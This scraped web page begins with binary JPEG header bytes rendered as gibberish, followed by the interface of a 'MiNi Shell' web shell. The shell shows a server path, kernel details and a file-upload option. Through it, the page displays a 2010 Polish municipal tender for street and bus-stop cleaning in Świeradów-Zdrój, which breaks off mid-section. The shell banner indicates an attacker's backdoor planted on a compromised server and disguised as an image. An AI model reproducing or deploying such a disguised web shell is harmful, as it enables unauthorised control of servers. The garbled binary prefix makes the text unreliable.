JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100312/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100312/55399-N-2010.html

<p class="kh_header"><b>Świeradów-Zdrój: Bieżące utrzymanie czystości ulic, chodników i placów na terenie Gminy Świeradów-Zdrój</b><br>
<b>Numer ogłoszenia: 55399 - 2010; data zamieszczenia: 12.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Świeradów-Zdrój , ul. 11-go Listopada 35, 59-850 Świeradów-Zdrój, woj. dolnośląskie, tel. 075 7816471, faks 075 7816585.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swieradowzdroj.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące utrzymanie czystości ulic, chodników i placów na terenie Gminy Świeradów-Zdrój.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie nr 1: standard I obejmuje powierzchnie utwardzone o długości 11393 m i powierzchni 78902 m2, chodniki o powierzchni 5984,5 m2, place o powierzchni 2000 m2

Zakres prac:
A. Element 1 zamówienia- Utrzymanie porządku na terenie objętym standardem I

1)Uprzątnięcie materiału uszorstniającego wysypanego w okresie zimowym z
     terenów określonych w pkt 1. 
2)Utrzymanie w systemie ciągłym czystości na terenach określonych w punkcie 1 poprzez ręczne i mechaniczne usunięcie zanieczyszczeń z pasa drogowego. 
3)Wywóz zebranych nieczystości organicznych w miejsce wskazane przez Zamawiającego na odległość nie większą niż 5 km od siedziby Zamawiającego. Wywóz zebranych nieczystości nieorganicznych winien nastąpić na składowisko odpadów komunalnych na odległość nie większą niż 35 km od siedziby Zamawiającego. Nie jest to odległość limitowana lecz szacunkowa dla określenia kosztów transportu odpadów. 
4)Uprzątnięcie liści z terenów określonych w pkt. 1. Prace należy wykonywać na bieżąco, z chwilą wystąpienia ich opadu. Wywóz uprzątniętych liści w miejsce wskazane przez Zamawiającego na odległość nie większą niż 5 km od siedziby Zamawiającego.
5)Usuwaniu skutków zdarzeń losowych, które nastąpiły na terenach wymienionych w pkt. 1, w szczególności: usuwanie wywróconych drzew, połamanych konarów, naniesionego rumoszu i nieczystości w czasie ulewnych deszczy. W przypadku wystąpienia klęski żywiołowej prace będą wykonywane na odrębne zlecenie.
6)Mechaniczne i chemiczne odchwaszczanie jezdni i chodników. Prace należy wykonać dwa razy w roku. Zniszczenia przylegających terenów zieleni dokonane przez niewłaściwe  użycie środków chemicznych będzie uważane jako nienależyte wykonanie elementu zamówienia. 
7)Obowiązek usuwania na bieżąco nieczystości zebranych z chodników przez właścicieli sąsiadujących posesji.
8)Zabrania się wjazdu na chodniki pojazdami o dopuszczalnej masie całkowitej przekraczającej 2,5 tony. W przypadku stwierdzenia przez Zamawiającego naruszenia w/w zakazu będzie traktowane jako nienależyte wykonanie elementu zamówienia.
9)Utrzymanie czystości i porządku terenów przy parkingach rowerowych, w tym koszenie traw, mycie co najmniej  1 raz w sezonie - Lokalizacja w Załączniku graficznym  nr 1/1 do Specyfikacji Technicznej Wykonania i Odbioru Robót stanowiącej załącznik nr 6 do SIWZ.
10)Wykonanie usługi winno odbywać się w godzinach od 5 do 10 i od 17 do 22. Użycie sprzętu mechanicznego (zamiatarka) może nastąpić w godzinach od 17 do 22. W wyjątkowych sytuacjach Wykonawca za zgodą Zamawiającego będzie mógł świadczyć usługę w innych godzinach. 
11)Zamawiający zastrzega sobie prawo prowadzenia kontroli wyrywkowej realizacji przedmiotu zamówienia bez powiadamiania Wykonawcy usługi. Ocenie będzie podlegała   czystość terenów objętych przedmiotem zamówienia według stanu na godzinę 800 każdego dnia świadczenia usługi.

B. Element 2 zamówienia - Utrzymanie w czystości terenów przed przystankami oraz pod zadaszeniem przystanków autobusowych - załącznik graficzny nr 1/1 do Specyfikacji Technicznej Wykonania i Odbioru Robót stanowiącej załącznik nr 6 do SIWZ.
1) Bieżąca konserwacje ławek znajdujących się we wiatach przystankowych, w szczególności poprzez mycie z użyciem środków chemicznych raz na miesiąc i impregnację jeden raz w trakcie trwania umowy.
2) Zamiatanie terenu przystanków z liści w czasie ich opadania oraz ich wywóz w miejsce wskazane przez Zamawiającego na odległość nie większą niż 5km od siedziby Zamawiającego.
3) Zamiatanie terenu przed przystankami oraz pod zadaszeniem na powierzchni 20m2 każdy, wraz z wywozem zebranych nieczystości w miejsce wskazane przez Zamawiającego na odległość nie większą niż 35km od siedziby Zamawiającego w przypadku odpadów nieorganicznych oraz 5 km w przypadku odpadów organicznych.
4) Wykaszanie traw wokół przystanków na powierzchni 8m x 3m = 24m2 każdy, wraz z wywozem trawy w miejsce wskazane przez Zamawiającego na odległość nie większą niż 5km od siedziby Zamawiającego.
5) Zakres prac obejmuje przystanki:
	a) dworzec PKS przy ulicy Kardynała Stefana Wyszyńskiego,
	b) przystanki PKS przy ulicy Grunwaldzkiej - 2szt.,
c)przystanek PKS przy ulicy Nadbrzeżnej.

Zadanie nr 2:
a)standard II obejmuje powierzchnie utwardzone o długości 4985 m i powierzchni 21483 m2 oraz rowy o długości 3825 m,
b)standard III obejmuje powierzchnie utwardzone o długości 8549 m i powierzchni 30786 m2 oraz rowy o długości 1750 m.

Zakres prac:
A. Element 1 zamówienia - Utrzymanie porządku na terenie objętym standardem II

a)Uprzątnięcie materiału uszorstniającego wysypanego w okresie zimowym z terenów określonych w pkt 1.
b)Ulice wymienione w punkcie 1 będą sprzątane 2 razy w każdym pełnym miesiącu kalendarzowym trwania umowy oraz raz w miesiącu niepełnym (poniżej 20 dni). 
c)Prace objęte umową będą odbierane po zgłoszeniu przez wykonawcę gotowości ich odbioru (nie rzadziej niż dwa razy w miesiącu).
d)Utrzymanie czystości na terenach określonych w punkcie 1 poprzez ręczne                              i mechaniczne usunięcie zanieczyszczeń z pasa drogowego. Wywóz zebranych nieczystości organicznych w miejsce wskazane przez Zamawiającego na odległość nie większą niż 5 km od siedziby Zamawiającego. Wywóz zebranych nieczystości nieorganicznych winien nastąpić na składowisko odpadów komunalnych na odległość nie większą niż 35 km od siedziby Zamawiającego. Nie jest to odległość limitowana lecz szacunkowa dla określenia kosztów transportu odpadów.
e)Mechaniczne i chemiczne odchwaszczanie jezdni i chodników. Zniszczenia przylegających terenów zieleni dokonane przez niewłaściwe  użycie środków chemicznych będzie uważane jako nienależyte wykonanie elementu zamówienia. 
f)Wykaszanie poboczy, na terenach zawartych w punkcie 1, dwa razy w każdym pełnym miesiącu kalendarzowym trwania umowy oraz raz w miesiącu niepełnym (poniżej 20 dni),  w tym koszenie traw wraz z usuwaniem samosiewów drzew nie starszych niż 5 lat (zgodnie z art. 83, ust. 6 pkt 4 ustawy z 16 kwietnia 2004 roku o ochronie przyrody tekst jednolity z 2009 r.  Dz. U. Nr  151, poz. 1220 z późniejszymi zmianami).
g)Uprzątnięcie liści z terenów określonych w pkt.1. Wywóz uprzątniętych liści                       w miejsce wskazane przez Zamawiającego na odległość nie większą niż 5 km od siedziby Zamawiającego. 
h)Bieżące utrzymanie czystości rowów przydrożnych, na terenach zawartych w punkcie 1, usuwanie nieczystości i nanosów po ulewnych deszczach. Dwa razy w trakcie trwania umowy (na koniec czerwca i na koniec października) usuwanie materii organicznej, w tym liści i koszenie trawy.
i)Usuwaniu skutków zdarzeń losowych, które nastąpiły na terenach wymienionych w pkt. 1, w szczególności: usuwanie wywróconych drzew, połamanych konarów, naniesionego rumoszu i nieczystości w czasie ulewnych deszczy. W przypadku wystąpienia klęski żywiołowej prace będą wykonywane na odrębne zlecenie.
j)Utrzymanie czystości i porządku terenów przy parkingach rowerowych, w tym koszenie traw, mycie co najmniej  1 raz w sezonie - Lokalizacja w Załączniku graficznym  nr 2/1 do Specyfikacji Technicznej Wykonania i Odbioru Robót stanowiącej załącznik nr 6 do SIWZ.

B. Element 2 zamówienia -  Utrzymanie porządku na terenie objętym standardem III
 Obszar prac - Załącznik graficzny nr 2/1 do Specyfikacji Technicznej Wykonania i Odbioru Robót stanowiącej załącznik nr 6 do SIWZ.
Zakres prac:

1.Uprzątnięcie materiału uszorstniającego wysypanego w okresie zimowym z terenów określonych w pkt 1.
2.Ulice wymienione w punkcie 1 będą sprzątane raz w miesiącu.
3.Prace objęte umową będą odbierane po zgłoszeniu przez wykonawcę gotowości ich odbioru (nie rzadziej niż raz w miesiącu).
4.Utrzymanie czystości na terenach określonych w punkcie 1 poprzez ręczne                       i mechaniczne usunięcie zanieczyszczeń z pasa drogowego. Wywóz zebranych nieczystości organicznych w miejsce wskazane przez Zamawiającego na odległość nie większą niż 5 km od siedziby Zamawiającego. Wywóz zebranych nieczystości nieorganicznych winien nastąpić na składowisko odpadów komunalnych na odległość nie większą niż 35 km od siedziby Zamawiającego. Nie jest to odległość limitowana lecz szacunkowa dla określenia kosztów transportu odpadów.
5.Mechaniczne i chemiczne odchwaszczanie jezdni i chodników. Zniszczenia przylegających terenów zieleni dokonane przez niewłaściwe użycie środków chemicznych będzie uważane jako nienależyte wykonanie elementu zamówienia. 
6.Wykaszanie poboczy, na terenach zawartych w punkcie 1, raz w miesiącu,  w tym koszenie traw wraz z usuwaniem samosiewów drzew nie starszych niż 5 lat (zgodnie z art. 83, ust. 6 pkt 4 ustawy z 16 kwietnia 2004 roku o ochronie przyrody tekst jednolity z 2009 r.  Dz. U. Nr  151, poz. 1220 z późniejszymi zmianami) oraz oczyszczanie opasek przy zieleni przyulicznej od strony jezdni polegające na odchwaszczaniu.
7.Uprzątnięcie liści z terenów określonych w pkt. 1. Wywóz uprzątniętych liści w miejsce wskazane przez Zamawiającego na odległość nie większą niż 5 km od siedziby Zamawiającego. 
8.Utrzymanie należytego stanu rowów przydrożnych, na terenach zawartych w punkcie 1,  usuwanie materii organicznej, w tym liści, trawy oraz nieczystości i nanosów po ulewnych deszczach. 
9.Usuwaniu skutków zdarzeń losowych, które nastąpiły na terenach wymienionych w pkt. 1, w szczególności: usuwanie wywróconych drzew, połamanych konarów, naniesionego rumoszu i nieczystości w czasie ulewnych deszczy. W przypadku wystąpienia klęski żywiołowej prace będą wykonywane na odrębne zlecenie.
10.Utrzymanie czystości i porządku terenów przy parkingach rowerowych, w tym koszenie traw, mycie co najmniej  1 raz w sezonie - Lokalizacja w Załączniku graficznym  nr 2/1 do Specyfikacji Technicznej Wykonania i Odbioru Robót stanowiącej załącznik nr 6 do SIWZ.

Zadanie nr 3: standard IV obejmuje powierzchnie nieutwardzone o długości 9123 m i powierzchni 20892 m2 oraz rowy o długości 1720 m,
Zakres prac:
1.Uprzątnięcie  materiału uszorstniającego wysypanego w okresie zimowym z terenów określonych w pkt 1
2.Drogi nieutwardzone wymienione w punkcie 1 będą sprzątane 3 razy w trakcie trwania umowy. Terminy sprzątania będą wyznaczone przez pracownika Zamawiającego na                2 dni przed ich rozpoczęciem.
3.Utrzymanie czystości na terenach określonych w punkcie 1 poprzez ręczne                      i mechaniczne usunięcie zanieczyszczeń z pasa drogowego. Wywóz zebranych nieczystości organicznych w miejsce wskazane przez Zamawiającego na odległość nie większą niż 5 km od siedziby Zamawiającego. Wywóz zebranych nieczystości nieorganicznych winien nastąpić na składowisko odpadów komunalnych na odległość nie większą niż 35 km od siedziby Zamawiającego. Nie jest to odległość limitowana lecz szacunkowa dla określenia kosztów transportu odpadów.
4.Uprzątnięcie z liści terenów określonych w pkt. 1. Wywóz uprzątniętych liści w miejsce wskazane przez Zamawiającego na odległość nie większą niż 5 km od siedziby Zamawiającego.
5.Wykaszanie pasa drogowego na terenach zawartych w punkcie 1, w tym koszenie traw wraz z usuwaniem samosiewów drzew nie starszych niż 5 lat (zgodnie z art. 83, ust. 6 pkt 4 ustawy z 16 kwietnia 2004 roku o ochronie przyrody tekst jednolity z 2009 r.  Dz. U. Nr  151, poz. 1220 z późniejszymi zmianami).
6.Utrzymanie należytego stanu rowów przydrożnych i odwodnień poprzecznych, na terenach zawartych w punkcie 1,  usuwanie materii organicznej, w tym liści, trawy, nieczystości oraz nanosów po ulewnych deszczach.
7.Usuwaniu skutków zdarzeń losowych, które nastąpiły na terenach wymienionych w pkt. 1, w szczególności: usuwanie wywróconych drzew, połamanych konarów, naniesionego rumoszu i nieczystości w czasie ulewnych deszczy. W przypadku wystąpienia klęski żywiołowej prace będą wykonywane na odrębne zlecenie.
8.Utrzymanie czystości i porządku terenów przy parkingach rowerowych, w tym koszenie traw, mycie co najmniej  1 raz w sezonie - Lokalizacja w Załączniku graficznym  nr 3/1 do Specyfikacji Technicznej Wykonania i Odbioru Robót stanowiącej załącznik nr 6 do SIWZ.

Zadanie nr 4: obejmuje powierzchnie utwardzone o długości 8349 m i powierzchni 32996 m2 oraz rowy o długości 2340 m, chodniki o powierzchni 1184 m2

A. Element 1 zamówienia: Utrzymanie czystości ulic, chodników i placów o powierzchniach utwardzonych - załącznik graficzny nr 4/1 do Specyfikacji Technicznej Wykonania i Odbioru Robót stanowiącej załącznik nr 6 do SIWZ.

Zakres prac:

a)Uprzątnięcie  materiału uszorstniającego wysypanego w okresie zimowym z terenów określonych w pkt 1.
b)Utrzymanie w systemie ciągłym czystości na terenach określonych w punkcie 1, poprzez ręczne i mechaniczne usunięcie zanieczyszczeń z pasa drogowego. Wywóz zebranych nieczystości organicznych w miejsce wskazane przez Zamawiającego na odległość nie większą niż 10 km od siedziby Zamawiającego. Wywóz zebranych nieczystości nieorganicznych winien nastąpić na składowisko odpadów komunalnych na odległość nie większą niż 35 km od siedziby Zamawiającego. Nie jest to odległość limitowana lecz szacunkowa dla określenia kosztów transportu odpadów.
c)Wykaszanie poboczy pasa drogowego na terenach zawartych w punkcie 1, w tym koszenie traw wraz z usuwaniem samosiewów drzew nie starszych niż 5 lat (zgodnie z art. 83, ust. 6 pkt 4 ustawy z 16 kwietnia 2004 roku o ochronie przyrody tekst jednolity z 2009 r.  Dz. U. Nr  151, poz. 1220 z późniejszymi zmianami).
d)Utrzymanie należytego stanu rowów przydrożnych i odwodnień poprzecznych, na terenach zawartych w punkcie 1,  usuwanie materii organicznej, w tym liści, trawy, nieczystości oraz nanosów po ulewnych deszczach. 
e)Uprzątnięcie liści z terenów określonych w pkt. 1. Prace należy wykonywać na bieżąco, z chwilą wystąpienia ich opadu. Wywóz uprzątniętych liści w miejsce wskazane przez Zamawiającego na odległość nie większą niż 10 km od siedziby Zamawiającego.
f)Usuwaniu skutków zdarzeń losowych, które nastąpiły na terenach wymienionych w pkt. 1, w szczególności: usuwanie wywróconych drzew, połamanych konarów, naniesionego rumoszu i nieczystości w czasie ulewnych deszczy. W przypadku wystąpienia klęski żywiołowej prace będą wykonywane na odrębne zlecenie.
g)Mechaniczne i chemiczne odchwaszczanie jezdni i chodników. Prace należy wykonać dwa razy w roku. Zniszczenia terenów zieleni przylegających poprzez niewłaściwe użycie środków chemicznych będzie uważane jako nienależyte wykonanie elementu zamówienia. 
h)Obowiązek usuwania na bieżąco nieczystości zebranych z chodników przez właścicieli sąsiadujących posesji.
i)Zabrania się wjazdu na chodniki pojazdami o dopuszczalnej masie całkowitej przekraczającej 2,5 tony. W przypadku stwierdzenia przez Zamawiającego naruszenia w/w zakazu będzie traktowane jako nienależyte wykonanie elementu zamówienia.
j)Utrzymanie czystości i porządku terenów przy parkingach rowerowych, w tym koszenie traw, mycie co najmniej  1 raz w sezonie - Lokalizacja w Załączniku graficznym  nr 4/1 do Specyfikacji Technicznej Wykonania i Odbioru Robót stanowiącej załącznik nr 6 do SIWZ.

B. Element 2 zamówienia: Utrzymanie czystości dróg gminnych nieutwardzonych - załącznik graficzny 4/1 do Specyfikacji Technicznej Wykonania i Odbioru Robót stanowiącej załącznik nr 6 do SIWZ.
Zakres prac:

a)Uprzątnięcie  materiału uszorstniającego wysypanego w okresie zimowym z terenów określonych w pkt 1
b)Wykaszanie pasa drogowego na terenach zawartych w punkcie 1, w tym koszenie traw wraz z usuwaniem samosiewów drzew nie starszych niż 5 lat (zgodnie z art. 83, ust. 6 pkt 4 ustawy z 16 kwietnia 2004 roku o ochronie przyrody tekst jednolity z 2009 r.  Dz. U. Nr  151, poz. 1220 z późniejszymi zmianami).
c)Utrzymanie należytego stanu rowów przydrożnych i odwodnień poprzecznych, na terenach zawartych w punkcie 1,  usuwanie materii organicznej, w tym liści, trawy, nieczystości oraz nanosów po ulewnych deszczach. 
d)Utrzymanie czystości na terenach określonych w punkcie 1 poprzez ręczne i mechaniczne usunięcie zanieczyszczeń z pasa drogowego. Wywóz zebranych nieczystości organicznych w miejsce wskazane przez Zamawiającego na odległość nie większą niż 10 km od siedziby Zamawiającego. Wywóz zebranych nieczystości nieorganicznych winien nastąpić na składowisko odpadów komunalnych na odległość nie większą niż 35 km od siedziby Zamawiającego. Nie jest to odległość limitowana lecz szacunkowa dla określenia kosztów transportu odpadów.
e)Uprzątnięcie z liści terenów określonych w pkt. 1. Wywóz uprzątniętych liści w miejsce wskazane przez Zamawiającego na odległość nie większą niż 10 km od siedziby Zamawiającego.
f)Usuwaniu skutków zdarzeń losowych, które nastąpiły na terenach wymienionych w pkt. 1, w szczególności: usuwanie wywróconych drzew, połamanych konarów, naniesionego rumoszu i nieczystości w czasie ulewnych deszczy. W przypadku wystąpienia klęski żywiołowej prace będą wykonywane na odrębne zlecenie.
g)Utrzymanie czystości i porządku terenów przy parkingach rowerowych, w tym koszenie traw, mycie co najmniej  1 raz w sezonie - Lokalizacja w Załączniku graficznym  nr 4/1 do Specyfikacji Technicznej Wykonania i Odbioru Robót stanowiącej załącznik nr 6 do SIWZ.
C. Element 3 zamówienia: Utrzymanie w czystości terenów przed przystankami oraz pod  zadaszeniem przystanków autobusowych - załącznik graficzny nr 4/1 do Specyfikacji Technicznej Wykonania i Odbioru Robót stanowiącej załącznik nr 6 do SIWZ.
      
1. Bieżące konserwacje ławek znajdujących się w wiatach przystankowych poprzez mycie           z użyciem środków chemicznych i impregnację.
2. Zamiatanie terenu przystanków z liści w czasie ich opadania oraz ich wywóz w miejsce wskazane przez Zamawiającego na odległość nie większą niż 10 km od siedziby Zamawiającego.
3. Zamiatanie terenu przed przystankiem oraz pod zadaszeniem na powierzchni 20m2 każdy, wraz z wywozem zebranych nieczystości w miejsce wskazane przez Zamawiającego                 na odległość nie większą niż 35 km od siedziby Zamawiającego w przypadku odpadów nieorganicznych oraz 10 km w przypadku odpadów organicznych.
a)Wykaszanie traw wokół przystanków na powierzchni 8m x 3m = 24m2 każdy wraz                z wywozem trawy w miejsce wskazane przez Zamawiającego na odległość nie większą niż 10 km od siedziby Zamawiającego.
b)Zakres prac obejmuje przystanki:
a) przystanek PKS przy ulicy Lwóweckiej,
b) przystanek PKS przy ulicy Sanatoryjnej,
c) przystanek PKS przy ulicy Izerskiej,
  d)przystanek PKS przy ulicy Sudeckiej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych o wartości do 50% zamówienia podstawowego, polegających na powtórzeniu zamówienia tego samego rodzaju.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.21.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania Wykonawca zobowiązany jest wnieść wadium w wysokości : Zadanie nr 1 - 3 200,00 zł  (słownie: trzy tysiące dwieście złotych), Zadanie nr 2 - 2 300,00 zł  (słownie: dwa tysiące trzysta złotych), Zadanie nr 3 - 100,00 zł  (słownie: sto złotych), Zadanie nr 4 - 900,00 zł  (słownie: dziewięćset złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy PZP. Wykonawca spełnia warunek nr 1 jeżeli przedłoży oświadczenie zgodne ze wzorem stanowiącym załącznik nr 2 do SIWZ. 2.Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy PZP. Wykonawca spełnia warunek nr 2 jeżeli przedłoży oświadczenie zgodne ze wzorem stanowiącym załącznik nr 3 do SIWZ. 3.Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy PZP. Wykonawca spełnia warunek nr 3 jeżeli przedłoży dokument w postaci aktualnego odpisu wystawionego przez uprawniony organ, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4.Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy PZP. Wykonawca spełnia warunek nr 4 jeżeli przedłoży  zezwolenie Burmistrza Miasta Świeradów-Zdrój na świadczenie usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości


aktualnego odpisu wystawionego przez uprawniony organ, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie  nr 1. Warunek 5.Wykonawca dysponuje potencjałem technicznym do wykonania zamówienia tj. dysponuje następującym sprzętem:
1) Zamiatarka mechaniczna,  samozbierająca do ulic ze zraszaczem - 1 szt.,
2) dmuchawa do liści - 2szt. Wykonawca spełni warunek
nr 5 jeżeli przedłożyć
Wykaz urządzeń technicznych dostępnych Wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
